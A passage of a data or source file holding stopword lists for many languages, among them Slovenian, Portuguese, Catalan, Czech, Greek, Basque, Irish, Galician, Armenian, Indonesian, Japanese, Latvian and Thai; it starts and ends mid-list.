        "ko",
        "koder",
        "koderkoli",
        "koga",
        "komu",
        "kot",
        "kratek",
        "kratka",
        "kratke",
        "kratki",
        "l",
        "lahka",
        "lahke",
        "lahki",
        "lahko",
        "le",
        "lep",
        "lepa",
        "lepe",
        "lepi",
        "lepo",
        "leto",
        "m",
        "maj",
        "majhen",
        "majhna",
        "majhni",
        "malce",
        "malo",
        "manj",
        "marec",
        "me",
        "med",
        "medtem",
        "mene",
        "mesec",
        "mi",
        "midva",
        "midve",
        "mnogo",
        "moj",
        "moja",
        "moje",
        "mora",
        "morajo",
        "moram",
        "moramo",
        "morate",
        "moraš",
        "morem",
        "mu",
        "n",
        "na",
        "nad",
        "naj",
        "najina",
        "najino",
        "najmanj",
        "naju",
        "največ",
        "nam",
        "narobe",
        "nas",
        "nato",
        "nazaj",
        "naš",
        "naša",
        "naše",
        "ne",
        "nedavno",
        "nedelja",
        "nek",
        "neka",
        "nekaj",
        "nekatere",
        "nekateri",
        "nekatero",
        "nekdo",
        "neke",
        "nekega",
        "neki",
        "nekje",
        "neko",
        "nekoga",
        "nekoč",
        "ni",
        "nikamor",
        "nikdar",
        "nikjer",
        "nikoli",
        "nič",
        "nje",
        "njega",
        "njegov",
        "njegova",
        "njegovo",
        "njej",
        "njemu",
        "njen",
        "njena",
        "njeno",
        "nji",
        "njih",
        "njihov",
        "njihova",
        "njihovo",
        "njiju",
        "njim",
        "njo",
        "njun",
        "njuna",
        "njuno",
        "no",
        "nocoj",
        "november",
        "npr.",
        "o",
        "ob",
        "oba",
        "obe",
        "oboje",
        "od",
        "odprt",
        "odprta",
        "odprti",
        "okoli",
        "oktober",
        "on",
        "onadva",
        "one",
        "oni",
        "onidve",
        "osem",
        "osma",
        "osmi",
        "osmo",
        "oz.",
        "p",
        "pa",
        "pet",
        "peta",
        "petek",
        "peti",
        "peto",
        "po",
        "pod",
        "pogosto",
        "poleg",
        "poln",
        "polna",
        "polni",
        "polno",
        "ponavadi",
        "ponedeljek",
        "ponovno",
        "potem",
        "povsod",
        "pozdravljen",
        "pozdravljeni",
        "prav",
        "prava",
        "prave",
        "pravi",
        "pravo",
        "prazen",
        "prazna",
        "prazno",
        "prbl.",
        "precej",
        "pred",
        "prej",
        "preko",
        "pri",
        "pribl.",
        "približno",
        "primer",
        "pripravljen",
        "pripravljena",
        "pripravljeni",
        "proti",
        "prva",
        "prvi",
        "prvo",
        "r",
        "ravno",
        "redko",
        "res",
        "reč",
        "s",
        "saj",
        "sam",
        "sama",
        "same",
        "sami",
        "samo",
        "se",
        "sebe",
        "sebi",
        "sedaj",
        "sedem",
        "sedma",
        "sedmi",
        "sedmo",
        "sem",
        "september",
        "seveda",
        "si",
        "sicer",
        "skoraj",
        "skozi",
        "slab",
        "smo",
        "so",
        "sobota",
        "spet",
        "sreda",
        "srednja",
        "srednji",
        "sta",
        "ste",
        "stran",
        "stvar",
        "sva",
        "t",
        "ta",
        "tak",
        "taka",
        "take",
        "taki",
        "tako",
        "takoj",
        "tam",
        "te",
        "tebe",
        "tebi",
        "tega",
        "težak",
        "težka",
        "težki",
        "težko",
        "ti",
        "tista",
        "tiste",
        "tisti",
        "tisto",
        "tj.",
        "tja",
        "to",
        "toda",
        "torek",
        "tretja",
        "tretje",
        "tretji",
        "tri",
        "tu",
        "tudi",
        "tukaj",
        "tvoj",
        "tvoja",
        "tvoje",
        "u",
        "v",
        "vaju",
        "vam",
        "vas",
        "vaš",
        "vaša",
        "vaše",
        "ve",
        "vedno",
        "velik",
        "velika",
        "veliki",
        "veliko",
        "vendar",
        "ves",
        "več",
        "vi",
        "vidva",
        "vii",
        "viii",
        "visok",
        "visoka",
        "visoke",
        "visoki",
        "vsa",
        "vsaj",
        "vsak",
        "vsaka",
        "vsakdo",
        "vsake",
        "vsaki",
        "vsakomur",
        "vse",
        "vsega",
        "vsi",
        "vso",
        "včasih",
        "včeraj",
        "x",
        "z",
        "za",
        "zadaj",
        "zadnji",
        "zakaj",
        "zaprta",
        "zaprti",
        "zaprto",
        "zdaj",
        "zelo",
        "zunaj",
        "č",
        "če",
        "često",
        "četrta",
        "četrtek",
        "četrti",
        "četrto",
        "čez",
        "čigav",
        "š",
        "šest",
        "šesta",
        "šesti",
        "šesto",
        "štiri",
        "ž",
        "že",
    ],
    "br": [
        "a",
        "ainda",
        "alem",
        "ambas",
        "ambos",
        "antes",
        "ao",
        "aonde",
        "aos",
        "apos",
        "aquele",
        "aqueles",
        "as",
        "assim",
        "com",
        "como",
        "contra",
        "contudo",
        "cuja",
        "cujas",
        "cujo",
        "cujos",
        "da",
        "das",
        "de",
        "dela",
        "dele",
        "deles",
        "demais",
        "depois",
        "desde",
        "desta",
        "deste",
        "dispoe",
        "dispoem",
        "diversa",
        "diversas",
        "diversos",
        "do",
        "dos",
        "durante",
        "e",
        "ela",
        "elas",
        "ele",
        "eles",
        "em",
        "entao",
        "entre",
        "essa",
        "essas",
        "esse",
        "esses",
        "esta",
        "estas",
        "este",
        "estes",
        "ha",
        "isso",
        "isto",
        "logo",
        "mais",
        "mas",
        "mediante",
        "menos",
        "mesma",
        "mesmas",
        "mesmo",
        "mesmos",
        "na",
        "nao",
        "nas",
        "nem",
        "nesse",
        "neste",
        "nos",
        "o",
        "os",
        "ou",
        "outra",
        "outras",
        "outro",
        "outros",
        "pelas",
        "pelo",
        "pelos",
        "perante",
        "pois",
        "por",
        "porque",
        "portanto",
        "propios",
        "proprio",
        "quais",
        "qual",
        "qualquer",
        "quando",
        "quanto",
        "que",
        "quem",
        "quer",
        "se",
        "seja",
        "sem",
        "sendo",
        "seu",
        "seus",
        "sob",
        "sobre",
        "sua",
        "suas",
        "tal",
        "tambem",
        "teu",
        "teus",
        "toda",
        "todas",
        "todo",
        "todos",
        "tua",
        "tuas",
        "tudo",
        "um",
        "uma",
        "umas",
        "uns",
    ],
    "ca": [
        "a",
        "abans",
        "ací",
        "ah",
        "així",
        "això",
        "al",
        "aleshores",
        "algun",
        "alguna",
        "algunes",
        "alguns",
        "alhora",
        "allà",
        "allí",
        "allò",
        "als",
        "altra",
        "altre",
        "altres",
        "amb",
        "ambdues",
        "ambdós",
        "apa",
        "aquell",
        "aquella",
        "aquelles",
        "aquells",
        "aquest",
        "aquesta",
        "aquestes",
        "aquests",
        "aquí",
        "baix",
        "cada",
        "cadascuna",
        "cadascunes",
        "cadascuns",
        "cadascú",
        "com",
        "contra",
        "d'un",
        "d'una",
        "d'unes",
        "d'uns",
        "dalt",
        "de",
        "del",
        "dels",
        "des",
        "després",
        "dins",
        "dintre",
        "donat",
        "doncs",
        "durant",
        "e",
        "eh",
        "el",
        "els",
        "em",
        "en",
        "encara",
        "ens",
        "entre",
        "eren",
        "es",
        "esta",
        "estaven",
        "esteu",
        "està",
        "estàvem",
        "estàveu",
        "et",
        "etc",
        "ets",
        "fins",
        "fora",
        "gairebé",
        "ha",
        "han",
        "has",
        "havia",
        "he",
        "hem",
        "heu",
        "hi",
        "ho",
        "i",
        "igual",
        "iguals",
        "ja",
        "l'hi",
        "la",
        "les",
        "li",
        "li'n",
        "llavors",
        "m'he",
        "ma",
        "mal",
        "malgrat",
        "mateix",
        "mateixa",
        "mateixes",
        "mateixos",
        "me",
        "mentre",
        "meu",
        "meus",
        "meva",
        "meves",
        "molt",
        "molta",
        "moltes",
        "molts",
        "mon",
        "mons",
        "més",
        "n'he",
        "n'hi",
        "ne",
        "ni",
        "no",
        "nogensmenys",
        "només",
        "nosaltres",
        "nostra",
        "nostre",
        "nostres",
        "o",
        "oh",
        "oi",
        "on",
        "pas",
        "pel",
        "pels",
        "per",
        "perquè",
        "però",
        "poc",
        "poca",
        "pocs",
        "poques",
        "potser",
        "propi",
        "qual",
        "quals",
        "quan",
        "quant",
        "que",
        "quelcom",
        "qui",
        "quin",
        "quina",
        "quines",
        "quins",
        "què",
        "s'ha",
        "s'han",
        "sa",
        "semblant",
        "semblants",
        "ses",
        "seu",
        "seus",
        "seva",
        "seves",
        "si",
        "sobre",
        "sobretot",
        "solament",
        "sols",
        "son",
        "sons",
        "sota",
        "sou",
        "sóc",
        "són",
        "t'ha",
        "t'han",
        "t'he",
        "ta",
        "tal",
        "també",
        "tampoc",
        "tan",
        "tant",
        "tanta",
        "tantes",
        "teu",
        "teus",
        "teva",
        "teves",
        "ton",
        "tons",
        "tot",
        "tota",
        "totes",
        "tots",
        "un",
        "una",
        "unes",
        "uns",
        "us",
        "va",
        "vaig",
        "vam",
        "van",
        "vas",
        "veu",
        "vosaltres",
        "vostra",
        "vostre",
        "vostres",
        "érem",
        "éreu",
        "és",
    ],
    "cs": [
        "a",
        "aby",
        "ahoj",
        "aj",
        "ale",
        "anebo",
        "ani",
        "ano",
        "asi",
        "aspoň",
        "atd",
        "atp",
        "ačkoli",
        "až",
        "bez",
        "beze",
        "blízko",
        "bohužel",
        "brzo",
        "bude",
        "budem",
        "budeme",
        "budete",
        "budeš",
        "budou",
        "budu",
        "by",
        "byl",
        "byla",
        "byli",
        "bylo",
        "byly",
        "bys",
        "být",
        "během",
        "chce",
        "chceme",
        "chcete",
        "chceš",
        "chci",
        "chtít",
        "chtějí",
        "chut'",
        "chuti",
        "co",
        "což",
        "cz",
        "daleko",
        "další",
        "den",
        "deset",
        "devatenáct",
        "devět",
        "dnes",
        "do",
        "dobrý",
        "docela",
        "dva",
        "dvacet",
        "dvanáct",
        "dvě",
        "dál",
        "dále",
        "děkovat",
        "děkujeme",
        "děkuji",
        "ho",
        "hodně",
        "i",
        "jak",
        "jakmile",
        "jako",
        "jakož",
        "jde",
        "je",
        "jeden",
        "jedenáct",
        "jedna",
        "jedno",
        "jednou",
        "jedou",
        "jeho",
        "jehož",
        "jej",
        "jejich",
        "její",
        "jelikož",
        "jemu",
        "jen",
        "jenom",
        "jestli",
        "jestliže",
        "ještě",
        "jež",
        "ji",
        "jich",
        "jimi",
        "jinak",
        "jiné",
        "již",
        "jsem",
        "jseš",
        "jsi",
        "jsme",
        "jsou",
        "jste",
        "já",
        "jí",
        "jím",
        "jíž",
        "k",
        "kam",
        "kde",
        "kdo",
        "kdy",
        "když",
        "ke",
        "kolik",
        "kromě",
        "kterou",
        "která",
        "které",
        "který",
        "kteří",
        "kvůli",
        "mají",
        "mezi",
        "mi",
        "mne",
        "mnou",
        "mně",
        "moc",
        "mohl",
        "mohou",
        "moje",
        "moji",
        "možná",
        "musí",
        "my",
        "má",
        "málo",
        "mám",
        "máme",
        "máte",
        "máš",
        "mé",
        "mí",
        "mít",
        "mě",
        "můj",
        "může",
        "na",
        "nad",
        "nade",
        "napište",
        "naproti",
        "načež",
        "naše",
        "naši",
        "ne",
        "nebo",
        "nebyl",
        "nebyla",
        "nebyli",
        "nebyly",
        "nedělají",
        "nedělá",
        "nedělám",
        "neděláme",
        "neděláte",
        "neděláš",
        "neg",
        "nejsi",
        "nejsou",
        "nemají",
        "nemáme",
        "nemáte",
        "neměl",
        "není",
        "nestačí",
        "nevadí",
        "než",
        "nic",
        "nich",
        "nimi",
        "nové",
        "nový",
        "nula",
        "nám",
        "námi",
        "nás",
        "náš",
        "ním",
        "ně",
        "něco",
        "nějak",
        "někde",
        "někdo",
        "němu",
        "němuž",
        "o",
        "od",
        "ode",
        "on",
        "ona",
        "oni",
        "ono",
        "ony",
        "osm",
        "osmnáct",
        "pak",
        "patnáct",
        "po",
        "pod",
        "podle",
        "pokud",
        "potom",
        "pouze",
        "pozdě",
        "pořád",
        "pravé",
        "pro",
        "prostě",
        "prosím",
        "proti",
        "proto",
        "protože",
        "proč",
        "první",
        "pta",
        "pět",
        "před",
        "přes",
        "přese",
        "při",
        "přičemž",
        "re",
        "rovně",
        "s",
        "se",
        "sedm",
        "sedmnáct",
        "si",
        "skoro",
        "smí",
        "smějí",
        "snad",
        "spolu",
        "sta",
        "sto",
        "strana",
        "sté",
        "své",
        "svých",
        "svým",
        "svými",
        "ta",
        "tady",
        "tak",
        "takhle",
        "taky",
        "také",
        "takže",
        "tam",
        "tamhle",
        "tamhleto",
        "tamto",
        "tato",
        "tebe",
        "tebou",
        "ted'",
        "tedy",
        "ten",
        "tento",
        "teto",
        "ti",
        "tipy",
        "tisíc",
        "tisíce",
        "to",
        "tobě",
        "tohle",
        "toho",
        "tohoto",
        "tom",
        "tomto",
        "tomu",
        "tomuto",
        "toto",
        "trošku",
        "tu",
        "tuto",
        "tvoje",
        "tvá",
        "tvé",
        "tvůj",
        "ty",
        "tyto",
        "téma",
        "tím",
        "tímto",
        "tě",
        "těm",
        "těmu",
        "třeba",
        "tři",
        "třináct",
        "u",
        "určitě",
        "už",
        "v",
        "vaše",
        "vaši",
        "ve",
        "vedle",
        "večer",
        "vlastně",
        "vy",
        "vám",
        "vámi",
        "vás",
        "váš",
        "více",
        "však",
        "všechno",
        "všichni",
        "vůbec",
        "vždy",
        "z",
        "za",
        "zatímco",
        "zač",
        "zda",
        "zde",
        "ze",
        "zprávy",
        "zpět",
        "čau",
        "či",
        "článku",
        "články",
        "čtrnáct",
        "čtyři",
        "šest",
        "šestnáct",
        "že",
    ],
    "el": [
        "αλλα",
        "αν",
        "αντι",
        "απο",
        "αυτα",
        "αυτεσ",
        "αυτη",
        "αυτο",
        "αυτοι",
        "αυτοσ",
        "αυτουσ",
        "αυτων",
        "για",
        "δε",
        "δεν",
        "εαν",
        "ειμαι",
        "ειμαστε",
        "ειναι",
        "εισαι",
        "ειστε",
        "εκεινα",
        "εκεινεσ",
        "εκεινη",
        "εκεινο",
        "εκεινοι",
        "εκεινοσ",
        "εκεινουσ",
        "εκεινων",
        "ενω",
        "επι",
        "η",
        "θα",
        "ισωσ",
        "κ",
        "και",
        "κατα",
        "κι",
        "μα",
        "με",
        "μετα",
        "μη",
        "μην",
        "να",
        "ο",
        "οι",
        "ομωσ",
        "οπωσ",
        "οσο",
        "οτι",
        "παρα",
        "ποια",
        "ποιεσ",
        "ποιο",
        "ποιοι",
        "ποιοσ",
        "ποιουσ",
        "ποιων",
        "που",
        "προσ",
        "πωσ",
        "σε",
        "στη",
        "στην",
        "στο",
        "στον",
        "τα",
        "την",
        "τησ",
        "το",
        "τον",
        "τοτε",
        "του",
        "των",
        "ωσ",
    ],
    "eu": [
        "al",
        "anitz",
        "arabera",
        "asko",
        "baina",
        "bat",
        "batean",
        "batek",
        "bati",
        "batzuei",
        "batzuek",
        "batzuetan",
        "batzuk",
        "bera",
        "beraiek",
        "berau",
        "berauek",
        "bere",
        "berori",
        "beroriek",
        "beste",
        "bezala",
        "da",
        "dago",
        "dira",
        "ditu",
        "du",
        "dute",
        "edo",
        "egin",
        "ere",
        "eta",
        "eurak",
        "ez",
        "gainera",
        "gu",
        "gutxi",
        "guzti",
        "haiei",
        "haiek",
        "haietan",
        "hainbeste",
        "hala",
        "han",
        "handik",
        "hango",
        "hara",
        "hari",
        "hark",
        "hartan",
        "hau",
        "hauei",
        "hauek",
        "hauetan",
        "hemen",
        "hemendik",
        "hemengo",
        "hi",
        "hona",
        "honek",
        "honela",
        "honetan",
        "honi",
        "hor",
        "hori",
        "horiei",
        "horiek",
        "horietan",
        "horko",
        "horra",
        "horrek",
        "horrela",
        "horretan",
        "horri",
        "hortik",
        "hura",
        "izan",
        "ni",
        "noiz",
        "nola",
        "non",
        "nondik",
        "nongo",
        "nor",
        "nora",
        "ze",
        "zein",
        "zen",
        "zenbait",
        "zenbat",
        "zer",
        "zergatik",
        "ziren",
        "zituen",
        "zu",
        "zuek",
        "zuen",
        "zuten",
    ],
    "ga": [
        "a",
        "ach",
        "ag",
        "agus",
        "an",
        "aon",
        "ar",
        "arna",
        "as",
        "b'",
        "ba",
        "beirt",
        "bhúr",
        "caoga",
        "ceathair",
        "ceathrar",
        "chomh",
        "chtó",
        "chuig",
        "chun",
        "cois",
        "céad",
        "cúig",
        "cúigear",
        "d'",
        "daichead",
        "dar",
        "de",
        "deich",
        "deichniúr",
        "den",
        "dhá",
        "do",
        "don",
        "dtí",
        "dá",
        "dár",
        "dó",
        "faoi",
        "faoin",
        "faoina",
        "faoinár",
        "fara",
        "fiche",
        "gach",
        "gan",
        "go",
        "gur",
        "haon",
        "hocht",
        "i",
        "iad",
        "idir",
        "in",
        "ina",
        "ins",
        "inár",
        "is",
        "le",
        "leis",
        "lena",
        "lenár",
        "m'",
        "mar",
        "mo",
        "mé",
        "na",
        "nach",
        "naoi",
        "naonúr",
        "ná",
        "ní",
        "níor",
        "nó",
        "nócha",
        "ocht",
        "ochtar",
        "os",
        "roimh",
        "sa",
        "seacht",
        "seachtar",
        "seachtó",
        "seasca",
        "seisear",
        "siad",
        "sibh",
        "sinn",
        "sna",
        "sé",
        "sí",
        "tar",
        "thar",
        "thú",
        "triúr",
        "trí",
        "trína",
        "trínár",
        "tríocha",
        "tú",
        "um",
        "ár",
        "é",
        "éis",
        "í",
        "ó",
        "ón",
        "óna",
        "ónár",
    ],
    "gl": [
        "a",
        "alí",
        "ao",
        "aos",
        "aquel",
        "aquela",
        "aquelas",
        "aqueles",
        "aquilo",
        "aquí",
        "as",
        "así",
        "aínda",
        "ben",
        "cando",
        "che",
        "co",
        "coa",
        "coas",
        "comigo",
        "con",
        "connosco",
        "contigo",
        "convosco",
        "cos",
        "cun",
        "cunha",
        "cunhas",
        "cuns",
        "da",
        "dalgunha",
        "dalgunhas",
        "dalgún",
        "dalgúns",
        "das",
        "de",
        "del",
        "dela",
        "delas",
        "deles",
        "desde",
        "deste",
        "do",
        "dos",
        "dun",
        "dunha",
        "dunhas",
        "duns",
        "e",
        "el",
        "ela",
        "elas",
        "eles",
        "en",
        "era",
        "eran",
        "esa",
        "esas",
        "ese",
        "eses",
        "esta",
        "estaba",
        "estar",
        "este",
        "estes",
        "estiven",
        "estou",
        "está",
        "están",
        "eu",
        "facer",
        "foi",
        "foron",
        "fun",
        "había",
        "hai",
        "iso",
        "isto",
        "la",
        "las",
        "lle",
        "lles",
        "lo",
        "los",
        "mais",
        "me",
        "meu",
        "meus",
        "min",
        "miña",
        "miñas",
        "moi",
        "na",
        "nas",
        "neste",
        "nin",
        "no",
        "non",
        "nos",
        "nosa",
        "nosas",
        "noso",
        "nosos",
        "nun",
        "nunha",
        "nunhas",
        "nuns",
        "nós",
        "o",
        "os",
        "ou",
        "para",
        "pero",
        "pode",
        "pois",
        "pola",
        "polas",
        "polo",
        "polos",
        "por",
        "que",
        "se",
        "senón",
        "ser",
        "seu",
        "seus",
        "sexa",
        "sido",
        "sobre",
        "súa",
        "súas",
        "tamén",
        "tan",
        "te",
        "ten",
        "ter",
        "teu",
        "teus",
        "teñen",
        "teño",
        "ti",
        "tido",
        "tiven",
        "tiña",
        "túa",
        "túas",
        "un",
        "unha",
        "unhas",
        "uns",
        "vos",
        "vosa",
        "vosas",
        "voso",
        "vosos",
        "vós",
        "á",
        "é",
        "ó",
        "ós",
    ],
    "hy": [
        "այդ",
        "այլ",
        "այն",
        "այս",
        "դու",
        "դուք",
        "եմ",
        "են",
        "ենք",
        "ես",
        "եք",
        "է",
        "էի",
        "էին",
        "էինք",
        "էիր",
        "էիք",
        "էր",
        "ըստ",
        "թ",
        "ի",
        "ին",
        "իսկ",
        "իր",
        "կամ",
        "համար",
        "հետ",
        "հետո",
        "մենք",
        "մեջ",
        "մի",
        "ն",
        "նա",
        "նաև",
        "նրա",
        "նրանք",
        "որ",
        "որը",
        "որոնք",
        "որպես",
        "ու",
        "ում",
        "պիտի",
        "վրա",
        "և",
    ],
    "id": [
        "ada",
        "adalah",
        "adanya",
        "adapun",
        "agak",
        "agaknya",
        "agar",
        "akan",
        "akankah",
        "akhirnya",
        "aku",
        "akulah",
        "amat",
        "amatlah",
        "anda",
        "andalah",
        "antar",
        "antara",
        "antaranya",
        "apa",
        "apaan",
        "apabila",
        "apakah",
        "apalagi",
        "apatah",
        "atau",
        "ataukah",
        "ataupun",
        "bagai",
        "bagaikan",
        "bagaimana",
        "bagaimanakah",
        "bagaimanapun",
        "bagi",
        "bahkan",
        "bahwa",
        "bahwasanya",
        "banyak",
        "beberapa",
        "begini",
        "beginian",
        "beginikah",
        "beginilah",
        "begitu",
        "begitukah",
        "begitulah",
        "begitupun",
        "belum",
        "belumlah",
        "berapa",
        "berapakah",
        "berapalah",
        "berapapun",
        "bermacam",
        "bersama",
        "betulkah",
        "biasa",
        "biasanya",
        "bila",
        "bilakah",
        "bisa",
        "bisakah",
        "boleh",
        "bolehkah",
        "bolehlah",
        "buat",
        "bukan",
        "bukankah",
        "bukanlah",
        "bukannya",
        "cuma",
        "dahulu",
        "dalam",
        "dan",
        "dapat",
        "dari",
        "daripada",
        "dekat",
        "demi",
        "demikian",
        "demikianlah",
        "dengan",
        "depan",
        "di",
        "dia",
        "dialah",
        "diantara",
        "diantaranya",
        "dikarenakan",
        "dini",
        "diri",
        "dirinya",
        "disini",
        "disinilah",
        "dong",
        "dulu",
        "enggak",
        "enggaknya",
        "entah",
        "entahlah",
        "hal",
        "hampir",
        "hanya",
        "hanyalah",
        "harus",
        "haruslah",
        "harusnya",
        "hendak",
        "hendaklah",
        "hendaknya",
        "hingga",
        "ia",
        "ialah",
        "ibarat",
        "ingin",
        "inginkah",
        "inginkan",
        "ini",
        "inikah",
        "inilah",
        "itu",
        "itukah",
        "itulah",
        "jangan",
        "jangankan",
        "janganlah",
        "jika",
        "jikalau",
        "juga",
        "justru",
        "kala",
        "kalau",
        "kalaulah",
        "kalaupun",
        "kalian",
        "kami",
        "kamilah",
        "kamu",
        "kamulah",
        "kan",
        "kapan",
        "kapankah",
        "kapanpun",
        "karena",
        "karenanya",
        "ke",
        "kecil",
        "kemudian",
        "kenapa",
        "kepada",
        "kepadanya",
        "ketika",
        "khususnya",
        "kini",
        "kinilah",
        "kiranya",
        "kita",
        "kitalah",
        "kok",
        "lagi",
        "lagian",
        "lah",
        "lain",
        "lainnya",
        "lalu",
        "lama",
        "lamanya",
        "lebih",
        "macam",
        "maka",
        "makanya",
        "makin",
        "malah",
        "malahan",
        "mampu",
        "mampukah",
        "mana",
        "manakala",
        "manalagi",
        "masih",
        "masihkah",
        "masing",
        "mau",
        "maupun",
        "melainkan",
        "melalui",
        "memang",
        "mengapa",
        "mereka",
        "merekalah",
        "merupakan",
        "meski",
        "meskipun",
        "mungkin",
        "mungkinkah",
        "nah",
        "namun",
        "nanti",
        "nantinya",
        "nyaris",
        "oleh",
        "olehnya",
        "pada",
        "padahal",
        "padanya",
        "paling",
        "pantas",
        "para",
        "pasti",
        "pastilah",
        "per",
        "percuma",
        "pernah",
        "pula",
        "pun",
        "rupanya",
        "saat",
        "saatnya",
        "saja",
        "sajalah",
        "saling",
        "sama",
        "sambil",
        "sampai",
        "sana",
        "sangat",
        "sangatlah",
        "saya",
        "sayalah",
        "se",
        "sebab",
        "sebabnya",
        "sebagai",
        "sebagaimana",
        "sebagainya",
        "sebaliknya",
        "sebanyak",
        "sebegini",
        "sebegitu",
        "sebelum",
        "sebelumnya",
        "sebenarnya",
        "seberapa",
        "sebetulnya",
        "sebisanya",
        "sebuah",
        "sedang",
        "sedangkan",
        "sedemikian",
        "sedikit",
        "sedikitnya",
        "segala",
        "segalanya",
        "segera",
        "seharusnya",
        "sehingga",
        "sejak",
        "sejenak",
        "sekali",
        "sekalian",
        "sekaligus",
        "sekalipun",
        "sekarang",
        "seketika",
        "sekiranya",
        "sekitar",
        "sekitarnya",
        "sela",
        "selagi",
        "selain",
        "selaku",
        "selalu",
        "selama",
        "selamanya",
        "seluruh",
        "seluruhnya",
        "semacam",
        "semakin",
        "semasih",
        "semaunya",
        "sementara",
        "sempat",
        "semua",
        "semuanya",
        "semula",
        "sendiri",
        "sendirinya",
        "seolah",
        "seorang",
        "sepanjang",
        "sepantasnya",
        "sepantasnyalah",
        "seperti",
        "sepertinya",
        "sering",
        "seringnya",
        "serta",
        "serupa",
        "sesaat",
        "sesama",
        "sesegera",
        "sesekali",
        "seseorang",
        "sesuatu",
        "sesuatunya",
        "sesudah",
        "sesudahnya",
        "setelah",
        "seterusnya",
        "setiap",
        "setidaknya",
        "sewaktu",
        "siapa",
        "siapakah",
        "siapapun",
        "sini",
        "sinilah",
        "suatu",
        "sudah",
        "sudahkah",
        "sudahlah",
        "supaya",
        "tadi",
        "tadinya",
        "tak",
        "tanpa",
        "tapi",
        "telah",
        "tentang",
        "tentu",
        "tentulah",
        "tentunya",
        "terdiri",
        "terhadap",
        "terhadapnya",
        "terlalu",
        "terlebih",
        "tersebut",
        "tersebutlah",
        "tertentu",
        "tetapi",
        "tiap",
        "tidak",
        "tidakkah",
        "tidaklah",
        "toh",
        "waduh",
        "wah",
        "wahai",
        "walau",
        "walaupun",
        "wong",
        "yaitu",
        "yakni",
        "yang",
    ],
    "ja": [
        "あっ",
        "あり",
        "ある",
        "い",
        "いう",
        "いる",
        "う",
        "うち",
        "お",
        "および",
        "おり",
        "か",
        "かつて",
        "から",
        "が",
        "き",
        "ここ",
        "こと",
        "この",
        "これ",
        "これら",
        "さ",
        "さらに",
        "し",
        "しかし",
        "する",
        "ず",
        "せ",
        "せる",
        "そして",
        "その",
        "その他",
        "その後",
        "それ",
        "それぞれ",
        "た",
        "ただし",
        "たち",
        "ため",
        "たり",
        "だ",
        "だっ",
        "つ",
        "て",
        "で",
        "でき",
        "できる",
        "です",
        "では",
        "でも",
        "と",
        "という",
        "といった",
        "とき",
        "ところ",
        "として",
        "とともに",
        "とも",
        "と共に",
        "な",
        "ない",
        "なお",
        "なかっ",
        "ながら",
        "なく",
        "なっ",
        "など",
        "なら",
        "なり",
        "なる",
        "に",
        "において",
        "における",
        "について",
        "にて",
        "によって",
        "により",
        "による",
        "に対して",
        "に対する",
        "に関する",
        "の",
        "ので",
        "のみ",
        "は",
        "ば",
        "へ",
        "ほか",
        "ほとんど",
        "ほど",
        "ます",
        "また",
        "または",
        "まで",
        "も",
        "もの",
        "ものの",
        "や",
        "よう",
        "より",
        "ら",
        "られ",
        "られる",
        "れ",
        "れる",
        "を",
        "ん",
        "及び",
        "特に",
    ],
    "lv": [
        "aiz",
        "ap",
        "apakš",
        "apakšpus",
        "ar",
        "arī",
        "augšpus",
        "bet",
        "bez",
        "bija",
        "biji",
        "biju",
        "bijām",
        "bijāt",
        "būs",
        "būsi",
        "būsiet",
        "būsim",
        "būt",
        "būšu",
        "caur",
        "diemžēl",
        "diezin",
        "droši",
        "dēļ",
        "esam",
        "esat",
        "esi",
        "esmu",
        "gan",
        "gar",
        "iekam",
        "iekams",
        "iekām",
        "iekāms",
        "iekš",
        "iekšpus",
        "ik",
        "ir",
        "it",
        "itin",
        "iz",
        "ja",
        "jau",
        "jeb",
        "jebšu",
        "jel",
        "jo",
        "jā",
        "ka",
        "kamēr",
        "kaut",
        "kolīdz",
        "kopš",
        "kā",
        "kļuva",
        "kļuvi",
        "kļuvu",
        "kļuvām",
        "kļuvāt",
        "kļūs",
        "kļūsi",
        "kļūsiet",
        "kļūsim",
        "kļūst",
        "kļūstam",
        "kļūstat",
        "kļūsti",
        "kļūstu",
        "kļūt",
        "kļūšu",
        "labad",
        "lai",
        "lejpus",
        "līdz",
        "līdzko",
        "ne",
        "nebūt",
        "nedz",
        "nekā",
        "nevis",
        "nezin",
        "no",
        "nu",
        "nē",
        "otrpus",
        "pa",
        "par",
        "pat",
        "pie",
        "pirms",
        "pret",
        "priekš",
        "pār",
        "pēc",
        "starp",
        "tad",
        "tak",
        "tapi",
        "taps",
        "tapsi",
        "tapsiet",
        "tapsim",
        "tapt",
        "tapāt",
        "tapšu",
        "taču",
        "te",
        "tiec",
        "tiek",
        "tiekam",
        "tiekat",
        "tieku",
        "tik",
        "tika",
        "tikai",
        "tiki",
        "tikko",
        "tiklab",
        "tiklīdz",
        "tiks",
        "tiksiet",
        "tiksim",
        "tikt",
        "tiku",
        "tikvien",
        "tikām",
        "tikāt",
        "tikšu",
        "tomēr",
        "topat",
        "turpretim",
        "turpretī",
        "tā",
        "tādēļ",
        "tālab",
        "tāpēc",
        "un",
        "uz",
        "vai",
        "var",
        "varat",
        "varēja",
        "varēji",
        "varēju",
        "varējām",
        "varējāt",
        "varēs",
        "varēsi",
        "varēsiet",
        "varēsim",
        "varēt",
        "varēšu",
        "vien",
        "virs",
        "virspus",
        "vis",
        "viņpus",
        "zem",
        "ārpus",
        "šaipus",
    ],
    "th": [
        "กล่าว",
        "กว่า",
        "กัน",
        "กับ",
        "การ",
        "ก็",
        "ก่อน",
        "ขณะ",
        "ขอ",
        "ของ",
        "ขึ้น",
        "คง",
        "ครั้ง",
        "ความ",
        "คือ",
        "จะ",
        "จัด",
        "จาก",
        "จึง",
        "ช่วง",
        "ซึ่ง",
        "ดัง",
        "ด้วย",
        "ด้าน",
        "ตั้ง",
        "ตั้งแต่",
        "ตาม",
        "ต่อ",
        "ต่าง",
        "ต่างๆ",
        "ต้อง",
        "ถึง",
        "ถูก",
        "ถ้า",
        "ทั้ง",
        "ทั้งนี้",
        "ทาง",
        "ที่",
        "ที่สุด",
        "ทุก",
        "ทํา",
        "ทําให้",
        "นอกจาก",
        "นัก",
        "นั้น",
        "นี้",
        "น่า",
        "นํา",
        "บาง",
        "ผล",
        "ผ่าน",
        "พบ",
        "พร้อม",
        "มา",
        "มาก",
        "มี",
        "ยัง",
        "รวม",
        "ระหว่าง",
        "รับ",
        "ราย",
        "ร่วม",
        "ลง",
        "วัน",
        "ว่า",
        "สุด",
        "ส่ง",
        "ส่วน",
        "สําหรับ",
        "หนึ่ง",
        "หรือ",
        "หลัง",
        "หลังจาก",
        "หลาย",
        "หาก",
        "อยาก",
        "อยู่",
        "อย่าง",
        "ออก",
        "อะไร",
        "อาจ",
        "อีก",
        "เขา",
        "เข้า",
        "เคย",
        "เฉพาะ",
        "เช่น",
        "เดียว",
        "เดียวกัน",
